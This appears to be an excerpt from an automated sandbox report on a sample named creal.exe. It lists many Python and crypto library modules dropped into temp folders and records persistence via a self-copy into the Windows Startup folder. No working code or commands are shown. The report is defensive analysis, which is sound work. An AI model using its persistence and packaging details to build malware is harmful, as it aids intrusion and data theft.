            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_RIPEMD160.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_cffi_backend.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_ctypes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Protocol\_scrypt.pydJump to dropped file

            Boot Survival

            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to behavior
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A6051F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF67A6051F0
            Source: C:\Users\user\Desktop\creal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\bcrypt\_bcrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\bcrypt\_bcrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_wmi.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed448.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_x25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA1.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_ARC4.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\win32\win32api.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD2.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_sqlite3.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA512.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_RIPEMD160.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_pkcs1_decode.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Protocol\_scrypt.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_portable.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2b.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_eksblowfish.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_strxor.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed25519.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_blowfish.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_overlapped.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ecb.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA384.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aesni.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_cpuid_c.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed448.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cast.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA224.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\win32\win32api.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD4.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32\pywintypes312.dll
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cbc.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2s.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_x25519.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\select.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ec_ws.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_arc2.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_multiprocessing.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_cffi_backend.cp312-win_amd64.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\pyexpat.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ecb.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_cpuid_c.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD4.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_poly1305.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_RIPEMD160.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_lzma.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_cffi_backend.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA224.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_ARC4.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA256.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\pywin32_system32\pywintypes312.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\_ctypes.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des3.pyd
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_clmul.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\_sqlite3.pyd
            Source: C:\Users\user\Desktop\creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aes.pyd
